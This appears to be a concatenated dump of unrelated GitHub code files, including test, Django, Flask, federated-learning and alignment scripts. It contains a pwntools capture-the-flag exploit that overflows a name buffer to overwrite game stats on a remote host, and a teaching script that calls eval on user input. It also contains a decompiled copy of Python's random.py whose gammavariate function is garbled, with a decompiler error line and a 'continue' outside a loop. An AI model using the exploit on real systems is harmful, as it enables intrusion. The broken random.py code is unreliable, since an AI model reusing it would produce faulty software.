):\n pass\n\n client = LightningClient()\n project = _get_project(client)\n try:\n res = client.lightningapp_instance_service_delete_lightningapp_instance(\n project_id=project.project_id,\n id=lightning_app_id,\n )\n assert res == {}\n except ApiException as e:\n print(f\"Failed to delete app {lightning_app_id}. Exception {e}\")\n\n\ndef validate_app_functionalities(app_page: \"Page\") -> None:\n \"\"\"\n app_page: The UI page of the app to be validated.\n \"\"\"\n\n while True:\n try:\n app_page.reload()\n sleep(5)\n app_label = app_page.frame_locator(\"iframe\").locator(\"text=Choose your AI task\")\n app_label.wait_for(timeout=30 * 1000)\n break\n except (\n playwright._impl._api_types.Error,\n playwright._impl._api_types.TimeoutError,\n ):\n pass\n\n input_field = app_page.frame_locator(\"iframe\").locator('input:below(:text(\"Data URL\"))').first\n input_field.wait_for(timeout=1000)\n input_field.type(\"https://pl-flash-data.s3.amazonaws.com/hymenoptera_data.zip\")\n sleep(1)\n upload_btn = app_page.frame_locator(\"iframe\").locator('button:has-text(\"Upload\")')\n upload_btn.wait_for(timeout=1000)\n upload_btn.click()\n\n sleep(10)\n\n train_folder_dropdown = app_page.frame_locator(\"iframe\").locator(\"#mui-2\")\n train_folder_dropdown.click()\n\n train_folder = app_page.frame_locator(\"iframe\").locator('text=\"hymenoptera_data/train\"')\n train_folder.scroll_into_view_if_needed()\n train_folder.click()\n\n val_folder_dropdown = app_page.frame_locator(\"iframe\").locator(\"#mui-3\")\n val_folder_dropdown.click()\n\n val_folder = app_page.frame_locator(\"iframe\").locator('text=\"hymenoptera_data/val\"')\n val_folder.scroll_into_view_if_needed()\n val_folder.click()\n\n train_btn = app_page.frame_locator(\"iframe\").locator('button:has-text(\"Start training!\")')\n train_btn.click()\n\n # Sometimes the results don't show until we refresh the page\n sleep(10)\n\n app_page.reload()\n\n app_page.frame_locator(\"iframe\").locator('button:has-text(\"RESULTS\")').click()\n runs = app_page.frame_locator(\"iframe\").locator(\"table tbody tr\")\n expect(runs).to_have_count(1, timeout=120000)\n\n # TODO: add more validations.\n\n\n@pytest.mark.skip(reason=\"launch button doesn't work for this app\")\ndef test_launch_app_from_gallery():\n app_name = os.getenv(\"TEST_APP_NAME\", None)\n if app_name is None:\n raise ValueError(\"TEST_APP_NAME environment variable is not set\")\n\n with get_gallery_app_page(app_name) as gallery_page:\n with launch_from_gallery_app_page(gallery_page) as app_page:\n validate_app_functionalities(app_page)\n\n\n@pytest.mark.skipif(not os.getenv(\"TEST_APP_NAME\", None), reason=\"requires TEST_APP_NAME env var\")\ndef test_clone_and_run_app_from_gallery():\n app_name = os.getenv(\"TEST_APP_NAME\", None)\n if app_name is None:\n raise ValueError(\"TEST_APP_NAME environment variable is not set\")\n\n with get_gallery_app_page(app_name) as gallery_page:\n with clone_and_run_from_gallery_app_page(gallery_page) as (_, app_page, _):\n validate_app_functionalities(app_page)\n\n\ndef test_app_locally():\n with sync_playwright() as p:\n browser = p.chromium.launch(headless=False)\n page = browser.new_page()\n\n page.goto(\"http://127.0.0.1:7501/view/Flashy\")\n\n validate_app_functionalities(page)\n","repo_name":"Lightning-Universe/Flashy_app","sub_path":"tests/test_app_gallery.py","file_name":"test_app_gallery.py","file_ext":"py","file_size_in_byte":9489,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"22039112350","text":"from django.contrib import admin\nfrom .models import ConnectionsList, ForgeLink\n\n\nclass ConnectionsListAdmin(admin.ModelAdmin):\n list_filter = [\"user\"]\n list_display = [\"user\"]\n search_fields = [\"user\"]\n read_only_fields = [\"user\"]\n\n class Meta:\n model = ConnectionsList\n\n\nadmin.site.register(ConnectionsList, ConnectionsListAdmin)\n\n\nclass ForgeLinkAdmin(admin.ModelAdmin):\n list_filter = [\"sender\", \"receiver\"]\n list_display = [\"sender\", \"receiver\"]\n search_fields = [\"sender__email\", \"receiver__email\",\n \"sender__username\", \"receiver__username\", ]\n\n class Meta:\n model = ForgeLink\n\n\nadmin.site.register(ForgeLink, ForgeLinkAdmin)\n","repo_name":"SahineDiallo/SpiderNetwork","sub_path":"Connection/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7774550886","text":"si = input (\"inserisci un numero: \" )\ni = float(si)\n\nif i < 0 :\n print(\"numero inferiore a zero\") \nelif i == 0:\n print(\"inseiro uguale a zero\")\nelse:\n print(\"numero maggiore di zero\")\n\n\nsi = eval(input (\"inserisci un numero: \" )) # The expression argument \n # is parsed and evaluated as a \n # Python expression (technically \n # speaking, a condition list) \n # using the globals and locals \n # dictionaries as global and local \n # namespace. \n\nif si < 0 :\n print(\"numero inferiore a zero\") \nelif si == 0:\n print(\"inseiro uguale a zero\")\nelse:\n print(\"numero maggiore di zero\")\n\n\n","repo_name":"lstorchi/teaching","sub_path":"helloworld/oltrehw4.py","file_name":"oltrehw4.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32691437151","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*\n\nfrom pwn import *\nfrom sys import argv\nfrom time import sleep\n\ncontext.terminal = ['terminator','-e']\ncontext.log_level = \"debug\"\n\nchall = \"./vuln\"\n#libc = ELF()\nelf = ELF(chall)\ncontext.binary = chall\ncontext.binary.checksec()\n\nif len(argv) >= 2 and argv[1] == \"r\":\n p = remote(\"35.200.120.35\", 9002)\nelif len(argv) >= 2 and argv[1] == \"d\":\n\tcmd = \"\"\"\n\t\tb *give_monster_name+222\n b *give_monster_name+140\n\t\tc\n\t\"\"\"\n\tp = gdb.debug(chall,cmd)\nelse:\n p = process(chall)\n\n# buf for name\npayload = b\"A\" * 0x8 * 2\n# HP\npayload += p64(0x600000000000006f)\n# ATK\npayload += p64(0x9fffffffffffffff)\np.recvuntil(\"Input name:\")\nsleep(0.5)\np.sendline(payload)\n\np.interactive()\n","repo_name":"t3mp-0xCC/write-up","sub_path":"nitic_ctf_2/pwn_monster_2/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6032124780","text":"#!/usr/bin/python3.8\n\nimport json\nfrom sys import stderr\nimport requests\nfrom gevent.pywsgi import WSGIServer\n\nfrom flask import Flask, request, Response, render_template\napp = Flask(__name__)\n\nimport confuse\nconfig = confuse.Configuration(__name__)\nconfig.set_file('config.yaml')\nconfig_data = config.get()\n\n@app.route('/', methods=['POST'])\ndef post(chat_name=None):\n if chat_name not in config_data:\n return Response(\"Not found\", status=404)\n dryRun = True if request.args.get('dry-run') else False\n\n try:\n data = json.loads(request.data)\n except Exception as e:\n print( str(e), file=stderr)\n return Response(\"Bad data format\", status=400)\n\n template_name = config_data[chat_name]['template'] if 'template' in config_data[chat_name] else 'default'\n try:\n template = render_template('{}.tpl'.format( template_name ), data=data )\n except Exception as e:\n error = \"Template {}.tpl error: {}\".format( template_name, e )\n print( error, file=stderr)\n return Response( error, status=400)\n\n if dryRun:\n return Response(template, status=200)\n else:\n return send_message( config_data[chat_name], template )\n\ndef send_message(chat, alert):\n url = \"https://api.telegram.org/bot{}/sendMessage\".format( chat['token'] )\n\n if len(alert) > 4096:\n alert = alert[:4093] + '...'\n\n params = (\n ( \"chat_id\", chat['chat_id'] ),\n ( \"text\", alert ),\n ( \"parse_mode\", \"markdown\" ),\n ( \"disable_web_page_preview\", \"True\" ),\n )\n\n try:\n r = requests.post( url, params=params )\n r.raise_for_status()\n except requests.exceptions.HTTPError as e:\n print(e.response.text, file=stderr)\n print(alert, file=stderr)\n return Response(e.response.text, status=400)\n else:\n return Response('OK', status=200)\n\nif __name__ == '__main__':\n http_server = WSGIServer(('', 5000), app)\n http_server.serve_forever()\n\n\n","repo_name":"danuk/k8s-telegram-sender","sub_path":"app/tlgrm_send.py","file_name":"tlgrm_send.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"20459210786","text":"from warnings import warn as _warn\nfrom types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType\nfrom math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil\nfrom math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin\nfrom os import urandom as _urandom\nfrom collections.abc import Set as _Set, Sequence as _Sequence\nfrom hashlib import sha512 as _sha512\n__all__ = ['Random', 'seed', 'random', 'uniform', 'randint', 'choice', 'sample', 'randrange', 'shuffle', 'normalvariate', 'lognormvariate', 'expovariate', 'vonmisesvariate', 'gammavariate', 'triangular', 'gauss', 'betavariate', 'paretovariate', 'weibullvariate', 'getstate', 'setstate', 'getrandbits', 'SystemRandom']\nNV_MAGICCONST = 4*_exp(-0.5)/_sqrt(2.0)\nTWOPI = 2.0*_pi\nLOG4 = _log(4.0)\nSG_MAGICCONST = 1.0 + _log(4.5)\nBPF = 53\nRECIP_BPF = 2**(-BPF)\nimport _random\n\nclass Random(_random.Random):\n __qualname__ = 'Random'\n VERSION = 3\n\n def __init__(self, x=None):\n self.seed(x)\n self.gauss_next = None\n\n def seed(self, a=None, version=2):\n if a is None:\n try:\n a = int.from_bytes(_urandom(32), 'big')\n except NotImplementedError:\n import time\n a = int(time.time()*256)\n if version == 2 and isinstance(a, (str, bytes, bytearray)):\n if isinstance(a, str):\n a = a.encode()\n a += _sha512(a).digest()\n a = int.from_bytes(a, 'big')\n super().seed(a)\n self.gauss_next = None\n\n def getstate(self):\n return (self.VERSION, super().getstate(), self.gauss_next)\n\n def setstate(self, state):\n version = state[0]\n if version == 3:\n (version, internalstate, self.gauss_next) = state\n super().setstate(internalstate)\n elif version == 2:\n (version, internalstate, self.gauss_next) = state\n try:\n internalstate = tuple(x % 4294967296 for x in internalstate)\n except ValueError as e:\n raise TypeError from e\n super().setstate(internalstate)\n else:\n raise ValueError('state with version %s passed to Random.setstate() of version %s' % (version, self.VERSION))\n\n def __getstate__(self):\n return self.getstate()\n\n def __setstate__(self, state):\n self.setstate(state)\n\n def __reduce__(self):\n return (self.__class__, (), self.getstate())\n\n def randrange(self, start, stop=None, step=1, _int=int):\n istart = _int(start)\n if istart != start:\n raise ValueError('non-integer arg 1 for randrange()')\n if stop is None:\n if istart > 0:\n return self._randbelow(istart)\n raise ValueError('empty range for randrange()')\n istop = _int(stop)\n if istop != stop:\n raise ValueError('non-integer stop for randrange()')\n width = istop - istart\n if step == 1 and width > 0:\n return istart + self._randbelow(width)\n if step == 1:\n raise ValueError('empty range for randrange() (%d,%d, %d)' % (istart, istop, width))\n istep = _int(step)\n if istep != step:\n raise ValueError('non-integer step for randrange()')\n if istep > 0:\n n = (width + istep - 1)//istep\n elif istep < 0:\n n = (width + istep + 1)//istep\n else:\n raise ValueError('zero step for randrange()')\n if n <= 0:\n raise ValueError('empty range for randrange()')\n return istart + istep*self._randbelow(n)\n\n def randint(self, a, b):\n return self.randrange(a, b + 1)\n\n def _randbelow(self, n, int=int, maxsize=1 << BPF, type=type, Method=_MethodType, BuiltinMethod=_BuiltinMethodType):\n getrandbits = self.getrandbits\n if type(self.random) is BuiltinMethod or type(getrandbits) is Method:\n k = n.bit_length()\n r = getrandbits(k)\n while r >= n:\n r = getrandbits(k)\n return r\n random = self.random\n if n >= maxsize:\n _warn('Underlying random() generator does not supply \\nenough bits to choose from a population range this large.\\nTo remove the range limitation, add a getrandbits() method.')\n return int(random()*n)\n rem = maxsize % n\n limit = (maxsize - rem)/maxsize\n r = random()\n while r >= limit:\n r = random()\n return int(r*maxsize) % n\n\n def choice(self, seq):\n try:\n i = self._randbelow(len(seq))\n except ValueError:\n raise IndexError('Cannot choose from an empty sequence')\n return seq[i]\n\n def shuffle(self, x, random=None):\n if random is None:\n randbelow = self._randbelow\n for i in reversed(range(1, len(x))):\n j = randbelow(i + 1)\n (x[i], x[j]) = (x[j], x[i])\n else:\n _int = int\n for i in reversed(range(1, len(x))):\n j = _int(random()*(i + 1))\n (x[i], x[j]) = (x[j], x[i])\n\n def sample(self, population, k):\n if isinstance(population, _Set):\n population = tuple(population)\n if not isinstance(population, _Sequence):\n raise TypeError('Population must be a sequence or set. For dicts, use list(d).')\n randbelow = self._randbelow\n n = len(population)\n if not 0 <= k <= n:\n raise ValueError('Sample larger than population')\n result = [None]*k\n setsize = 21\n if k > 5:\n setsize += 4**_ceil(_log(k*3, 4))\n if n <= setsize:\n pool = list(population)\n for i in range(k):\n j = randbelow(n - i)\n result[i] = pool[j]\n pool[j] = pool[n - i - 1]\n else:\n selected = set()\n selected_add = selected.add\n for i in range(k):\n j = randbelow(n)\n while j in selected:\n j = randbelow(n)\n selected_add(j)\n result[i] = population[j]\n return result\n\n def uniform(self, a, b):\n return a + (b - a)*self.random()\n\n def triangular(self, low=0.0, high=1.0, mode=None):\n u = self.random()\n c = 0.5 if mode is None else (mode - low)/(high - low)\n if u > c:\n u = 1.0 - u\n c = 1.0 - c\n (low, high) = (high, low)\n return low + (high - low)*(u*c)**0.5\n\n def normalvariate(self, mu, sigma):\n random = self.random\n while True:\n u1 = random()\n u2 = 1.0 - random()\n z = NV_MAGICCONST*(u1 - 0.5)/u2\n zz = z*z/4.0\n if zz <= -_log(u2):\n break\n return mu + z*sigma\n\n def lognormvariate(self, mu, sigma):\n return _exp(self.normalvariate(mu, sigma))\n\n def expovariate(self, lambd):\n return -_log(1.0 - self.random())/lambd\n\n def vonmisesvariate(self, mu, kappa):\n random = self.random\n if kappa <= 1e-06:\n return TWOPI*random()\n s = 0.5/kappa\n r = s + _sqrt(1.0 + s*s)\n while True:\n u1 = random()\n z = _cos(_pi*u1)\n d = z/(r + z)\n u2 = random()\n if u2 < 1.0 - d*d or u2 <= (1.0 - d)*_exp(d):\n break\n q = 1.0/r\n f = (q + z)/(1.0 + q*z)\n u3 = random()\n if u3 > 0.5:\n theta = (mu + _acos(f)) % TWOPI\n else:\n theta = (mu - _acos(f)) % TWOPI\n return theta\n\n def gammavariate(self, alpha, beta):\n if alpha <= 0.0 or beta <= 0.0:\n raise ValueError('gammavariate: alpha and beta must be > 0.0')\n random = self.random\n if alpha > 1.0:\n ainv = _sqrt(2.0*alpha - 1.0)\n bbb = alpha - LOG4\n ccc = alpha + ainv\n u1 = random()\n if not 1e-07 < u1 < 0.9999999:\n continue\n u2 = 1.0 - random()\n v = _log(u1/(1.0 - u1))/ainv\n x = alpha*_exp(v)\n z = u1*u1*u2\n r = bbb + ccc*v - x\n #ERROR: Unexpected statement: 517 BINARY_MULTIPLY | 518 RETURN_VALUE \n\n if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):\n return x*beta\n continue\n else:\n if alpha == 1.0:\n u = random()\n while u <= 1e-07:\n u = random()\n return -_log(u)*beta\n while True:\n u = random()\n b = (_e + alpha)/_e\n p = b*u\n if p <= 1.0:\n x = p**(1.0/alpha)\n else:\n x = -_log((b - p)/alpha)\n u1 = random()\n if p > 1.0:\n if u1 <= x**(alpha - 1.0):\n break\n continue\n if u1 <= _exp(-x):\n break\n elif u1 <= _exp(-x):\n break\n return x*beta\n\n def gauss(self, mu, sigma):\n random = self.random\n z = self.gauss_next\n self.gauss_next = None\n if z is None:\n x2pi = random()*TWOPI\n g2rad = _sqrt(-2.0*_log(1.0 - random()))\n z = _cos(x2pi)*g2rad\n self.gauss_next = _sin(x2pi)*g2rad\n return mu + z*sigma\n\n def betavariate(self, alpha, beta):\n y = self.gammavariate(alpha, 1.0)\n if y == 0:\n return 0.0\n return y/(y + self.gammavariate(beta, 1.0))\n\n def paretovariate(self, alpha):\n u = 1.0 - self.random()\n return 1.0/u**(1.0/alpha)\n\n def weibullvariate(self, alpha, beta):\n u = 1.0 - self.random()\n return alpha*(-_log(u))**(1.0/beta)\n\nclass SystemRandom(Random):\n __qualname__ = 'SystemRandom'\n\n def random(self):\n return (int.from_bytes(_urandom(7), 'big') >> 3)*RECIP_BPF\n\n def getrandbits(self, k):\n if k <= 0:\n raise ValueError('number of bits must be greater than zero')\n if k != int(k):\n raise TypeError('number of bits should be an integer')\n numbytes = (k + 7)//8\n x = int.from_bytes(_urandom(numbytes), 'big')\n return x >> numbytes*8 - k\n\n def seed(self, *args, **kwds):\n pass\n\n def _notimplemented(self, *args, **kwds):\n raise NotImplementedError('System entropy source does not have state.')\n\n getstate = setstate = _notimplemented\n\ndef _test_generator(n, func, args):\n import time\n print(n, 'times', func.__name__)\n total = 0.0\n sqsum = 0.0\n smallest = 10000000000.0\n largest = -10000000000.0\n t0 = time.time()\n for i in range(n):\n x = func(*args)\n total += x\n sqsum = sqsum + x*x\n smallest = min(x, smallest)\n largest = max(x, largest)\n t1 = time.time()\n print(round(t1 - t0, 3), 'sec,', end=' ')\n avg = total/n\n stddev = _sqrt(sqsum/n - avg*avg)\n print('avg %g, stddev %g, min %g, max %g' % (avg, stddev, smallest, largest))\n\ndef _test(N=2000):\n _test_generator(N, random, ())\n _test_generator(N, normalvariate, (0.0, 1.0))\n _test_generator(N, lognormvariate, (0.0, 1.0))\n _test_generator(N, vonmisesvariate, (0.0, 1.0))\n _test_generator(N, gammavariate, (0.01, 1.0))\n _test_generator(N, gammavariate, (0.1, 1.0))\n _test_generator(N, gammavariate, (0.1, 2.0))\n _test_generator(N, gammavariate, (0.5, 1.0))\n _test_generator(N, gammavariate, (0.9, 1.0))\n _test_generator(N, gammavariate, (1.0, 1.0))\n _test_generator(N, gammavariate, (2.0, 1.0))\n _test_generator(N, gammavariate, (20.0, 1.0))\n _test_generator(N, gammavariate, (200.0, 1.0))\n _test_generator(N, gauss, (0.0, 1.0))\n _test_generator(N, betavariate, (3.0, 3.0))\n _test_generator(N, triangular, (0.0, 1.0, 0.3333333333333333))\n\n_inst = Random()\nseed = _inst.seed\nrandom = _inst.random\nuniform = _inst.uniform\ntriangular = _inst.triangular\nrandint = _inst.randint\nchoice = _inst.choice\nrandrange = _inst.randrange\nsample = _inst.sample\nshuffle = _inst.shuffle\nnormalvariate = _inst.normalvariate\nlognormvariate = _inst.lognormvariate\nexpovariate = _inst.expovariate\nvonmisesvariate = _inst.vonmisesvariate\ngammavariate = _inst.gammavariate\ngauss = _inst.gauss\nbetavariate = _inst.betavariate\nparetovariate = _inst.paretovariate\nweibullvariate = _inst.weibullvariate\ngetstate = _inst.getstate\nsetstate = _inst.setstate\ngetrandbits = _inst.getrandbits\nif __name__ == '__main__':\n _test()\n","repo_name":"johndpope/sims4-ai-engine","sub_path":"base/lib/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":12657,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"34740030866","text":"from utils import *\r\nfrom tqdm import tqdm\r\nJACCARD_THR = 0.35\r\n\r\n\r\ndef span2indice(span, SentCharIdx):\r\n indice = []\r\n sub_spans = span.split(';')\r\n for sub_span in sub_spans:\r\n lims = [int(elem) - SentCharIdx for elem in sub_span.split(',')]\r\n indice += list(range(lims[0], lims[1]))\r\n return set(indice)\r\n\r\n\r\ndef calc_jaccard(row1, row2, isDoc):\r\n span1 = row1[\"docSpanOffsets\"] if isDoc else row1[\"summarySpanOffsets\"]\r\n span2 = row2[\"docSpanOffsets\"] if isDoc else row2[\"summarySpanOffsets\"]\r\n SentCharIdx1 = row1[\"docSentCharIdx\"] if isDoc else row1[\"scuSentCharIdx\"]\r\n SentCharIdx2 = row2[\"docSentCharIdx\"] if isDoc else row2[\"scuSentCharIdx\"]\r\n\r\n indice1 = span2indice(span1, SentCharIdx1)\r\n indice2 = span2indice(span2, SentCharIdx2)\r\n\r\n union_list = list(set.union(indice1,indice2))\r\n intersection_list = list(set.intersection(indice1,indice2))\r\n return float(len(intersection_list)) / float(len(union_list))\r\n\r\ndef get_final_df_row(QASem_row, pyramid_row, doc_jaccard, summary_jaccard):\r\n new_row = {\"database\": pyramid_row[\"database\"],\r\n \"topic\": pyramid_row[\"topic\"],\r\n \"scuSentCharIdx\": pyramid_row[\"scuSentCharIdx\"],\r\n \"scuSentence\": pyramid_row[\"scuSentence\"],\r\n \"documentFile\": pyramid_row[\"documentFile\"],\r\n \"docSentCharIdx\": pyramid_row[\"docSentCharIdx\"],\r\n \"docSentText\": pyramid_row[\"docSentText\"],\r\n \"docSpanOieOffsets\": QASem_row[\"docSpanOffsets\"],\r\n \"docSpanOffsets\": pyramid_row[\"docSpanOffsets\"],\r\n \"docSpanOieText\": QASem_row[\"docSpanText\"],\r\n \"docSpanText\": pyramid_row[\"docSpanText\"],\r\n \"summarySpanOieOffsets\": QASem_row[\"summarySpanOffsets\"],\r\n \"summarySpanOffsets\": pyramid_row[\"summarySpanOffsets\"],\r\n \"summarySpanOieText\": QASem_row[\"summarySpanText\"],\r\n \"summarySpanText\": pyramid_row[\"summarySpanText\"],\r\n \"docSpanJaccard\": str(doc_jaccard),\r\n \"summarySpanJaccard\": str(summary_jaccard)}\r\n return new_row\r\n\r\n\r\n\r\ndef get_alignments_df(all_QASem_spans_df, aligned_pyramid_spans):\r\n final_df = pd.DataFrame(\r\n columns=[\"database\", \"topic\", \"scuSentCharIdx\", \"scuSentence\", \"documentFile\", \"docSentCharIdx\", \"docSentText\", \"docSpanOieOffsets\",\r\n \"docSpanOffsets\", \"docSpanOieText\", \"docSpanText\", \"summarySpanOieOffsets\", \"summarySpanOffsets\", \"summarySpanOieText\",\r\n \"summarySpanText\", \"docSpanJaccard\", \"summarySpanJaccard\", \"scuLabel\"])\r\n\r\n pbar = tqdm(total=all_QASem_spans_df.shape[0], unit=\"QASem span pairs\")\r\n for i, row in all_QASem_spans_df.iterrows():\r\n curr_aligned_pyramid_spans = aligned_pyramid_spans.loc[(aligned_pyramid_spans[\"topic\"] == row[\"topic\"]) &\r\n (aligned_pyramid_spans[\"documentFile\"] == row[\"documentFile\"]) &\r\n (aligned_pyramid_spans[\"scuSentCharIdx\"] == row[\"scuSentCharIdx\"]) &\r\n (aligned_pyramid_spans[\"docSentCharIdx\"] == row[\"docSentCharIdx\"])]\r\n if curr_aligned_pyramid_spans.shape[0]>0: # not an empty df\r\n for j, p_row in curr_aligned_pyramid_spans.iterrows():\r\n doc_span_jaccard = calc_jaccard(row, p_row, True)\r\n summary_span_jaccard = calc_jaccard(row, p_row, False)\r\n if doc_span_jaccard > JACCARD_THR and summary_span_jaccard > JACCARD_THR:\r\n final_df = final_df.append(get_final_df_row(row, p_row, doc_span_jaccard, summary_span_jaccard), ignore_index=True) # AVIVSL: change ignore_index to False?\r\n pbar.update(1)\r\n pbar.close()\r\n final_df = final_df.drop_duplicates(subset=[\"database\", \"topic\", \"scuSentCharIdx\",\r\n \"scuSentence\", \"documentFile\", \"docSentCharIdx\",\r\n \"docSentText\", \"docSpanOieOffsets\", \"docSpanOieText\",\r\n \"summarySpanOieOffsets\", \"summarySpanOieText\"]) # remove QASem spans duplicates\r\n return final_df\r\n\r\ndef main(args):\r\n indir = args.indir\r\n outdir = args.outdir\r\n\r\n aligned_pyramid_spans = pd.read_csv(indir)\r\n aligned_pyramid_spans = aligned_pyramid_spans.drop_duplicates(subset=[\"database\", \"topic\", \"scuSentCharIdx\",\r\n \"scuSentence\", \"documentFile\", \"docSentCharIdx\",\r\n \"docSentText\", \"docSpanOffsets\", \"docSpanText\",\r\n \"summarySpanOffsets\", \"summarySpanText\"]) # remove pyramid spans duplicates (caused by intersections of the spans with more than one set of doc-summary oie spans)\r\n\r\n databases = list(set(aligned_pyramid_spans.database))\r\n for db in databases:\r\n all_QASem_spans_file = os.path.join(os.path.dirname(indir), HELPER_DIR_NAME, f\"all_span_combinations_{db}.csv\")\r\n all_QASem_spans_df = pd.read_csv(all_QASem_spans_file)\r\n\r\n print(f\"start {db}\")\r\n final_df = get_alignments_df(all_QASem_spans_df, aligned_pyramid_spans)\r\n\r\n curr_outdir = os.path.join(outdir, f\"QAsem_aligned_spans_{db}.csv\")\r\n final_df.to_csv(curr_outdir, index=True)\r\n print(f\"done {db}\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n argparser = argparse.ArgumentParser(description=\"\")\r\n argparser.add_argument(\"-i\", \"--indir\", required=True, help=\"path to train_full_details_with_oies_no_duplications.csv\")\r\n argparser.add_argument(\"-o\", \"--outdir\", required=True, help=\"path to where to save the aligned spans\")\r\n main(argparser.parse_args())","repo_name":"lovodkin93/automatic_aligned_QASem_spans","sub_path":"retrain_superPal_preprocess/get_alignments.py","file_name":"get_alignments.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7284040082","text":"from typing import Dict, Optional, Tuple\nfrom collections import OrderedDict\nimport argparse\nfrom torch.utils.data import DataLoader\n\nimport flwr as fl\nimport torch\n\nimport utils\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\ndef fit_config(server_round: int):\n \"\"\"Return training configuration dict for each round.\n\n Keep batch size fixed at 32, perform two rounds of training with one local epoch,\n increase to two local epochs afterwards.\n \"\"\"\n config = {\n \"batch_size\": 16,\n \"local_epochs\": 1 if server_round < 2 else 2,\n }\n return config\n\n\ndef evaluate_config(server_round: int):\n \"\"\"Return evaluation configuration dict for each round.\n\n Perform five local evaluation steps on each client (i.e., use five batches) during\n rounds one to three, then increase to ten local evaluation steps.\n \"\"\"\n val_steps = 5 if server_round < 4 else 10\n return {\"val_steps\": val_steps}\n\n\ndef get_evaluate_fn(model: torch.nn.Module, toy: bool):\n \"\"\"Return an evaluation function for server-side evaluation.\"\"\"\n\n # Load data and model here to avoid the overhead of doing it in `evaluate` itself\n trainset, _, _ = utils.load_data()\n\n n_train = len(trainset)\n if toy:\n # use only 10 samples as validation set\n valset = torch.utils.data.Subset(trainset, range(n_train - 10, n_train))\n else:\n # Use the last 5k training examples as a validation set\n valset = torch.utils.data.Subset(trainset, range(n_train - 5000, n_train))\n\n valLoader = DataLoader(valset, batch_size=16)\n\n # The `evaluate` function will be called after every round\n def evaluate(\n server_round: int,\n parameters: fl.common.NDArrays,\n config: Dict[str, fl.common.Scalar],\n ) -> Optional[Tuple[float, Dict[str, fl.common.Scalar]]]:\n # Update model with the latest parameters\n params_dict = zip(model.state_dict().keys(), parameters)\n state_dict = OrderedDict({k: torch.tensor(v) for k, v in params_dict})\n model.load_state_dict(state_dict, strict=True)\n\n loss, accuracy = utils.test(model, valLoader)\n return loss, {\"accuracy\": accuracy}\n\n return evaluate\n\n\ndef main():\n \"\"\"Load model for\n 1. server-side parameter initialization\n 2. server-side parameter evaluation\n \"\"\"\n\n # Parse command line argument `partition`\n parser = argparse.ArgumentParser(description=\"Flower\")\n parser.add_argument(\n \"--toy\",\n type=bool,\n default=False,\n required=False,\n help=\"Set to true to use only 10 datasamples for validation. \\\n Useful for testing purposes. Default: False\",\n )\n\n args = parser.parse_args()\n\n model = utils.load_efficientnet(classes=10)\n\n model_parameters = [val.cpu().numpy() for _, val in model.state_dict().items()]\n\n # Create strategy\n strategy = fl.server.strategy.FedAvg(\n fraction_fit=0.2,\n fraction_evaluate=0.2,\n min_fit_clients=2,\n min_evaluate_clients=2,\n min_available_clients=10,\n evaluate_fn=get_evaluate_fn(model, args.toy),\n on_fit_config_fn=fit_config,\n on_evaluate_config_fn=evaluate_config,\n initial_parameters=fl.common.ndarrays_to_parameters(model_parameters),\n )\n\n # Start Flower server for four rounds of federated learning\n fl.server.start_server(\n server_address=\"0.0.0.0:8080\",\n config=fl.server.ServerConfig(num_rounds=4),\n strategy=strategy,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"adap/flower","sub_path":"examples/advanced-pytorch/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","stars":3287,"dataset":"github-code","pt":"61"} +{"seq_id":"14556864024","text":"def checkio(game_result):\n def _check_candidates(candidates):\n for side in ['X', 'O']:\n if any([c for c in candidates if c == side*3]):\n return side\n \n result = _check_candidates(game_result)\n if result:\n return result\n\n columns = [''.join([row[col] for row in game_result]) for col in range(0, 3)]\n result = _check_candidates(columns)\n if result:\n return result\n \n diagonals = [''.join([game_result[r][c] for r, c in zip(range(0, 3), range(0, 3))]),\n ''.join(game_result[r][c] for r, c in zip(range(0, 3), range(2, -1, -1)))]\n result = _check_candidates(diagonals)\n if result:\n return result\n\n return 'D'\n\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio([\n \"X.O\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins\"\n assert checkio([\n \"OO.\",\n \"XOX\",\n \"XOX\"]) == \"O\", \"Os wins\"\n assert checkio([\n \"OOX\",\n \"XXO\",\n \"OXX\"]) == \"D\", \"Draw\"\n assert checkio([\n \"O.X\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins again\"\n\n","repo_name":"artPlusPlus/checkio","sub_path":"x-o-referee.py","file_name":"x-o-referee.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18373696954","text":"\"\"\"I wrote a fully automated Vigenere Cipher cracker\nsubmitted 1 year ago by Ouro130Ros\nYou can find the python code at pastebin\nThis class allows you to encrypt, decrypt and crack the Vigenere cipher.\nTo Encrypt simply instantiate the class and call .Encrypt(plainText, key)\nTo Decrypt simply call .Decrypt(cipherText, key)\nTo Crack call .Crack(cipherText, pathToEnglishDictionaryFile, candidateCount, passPercentage)\nI used this for a dictionary but any in the same format will work.\nThe Candidate count is the number of passwords to test at each key length.\nThe 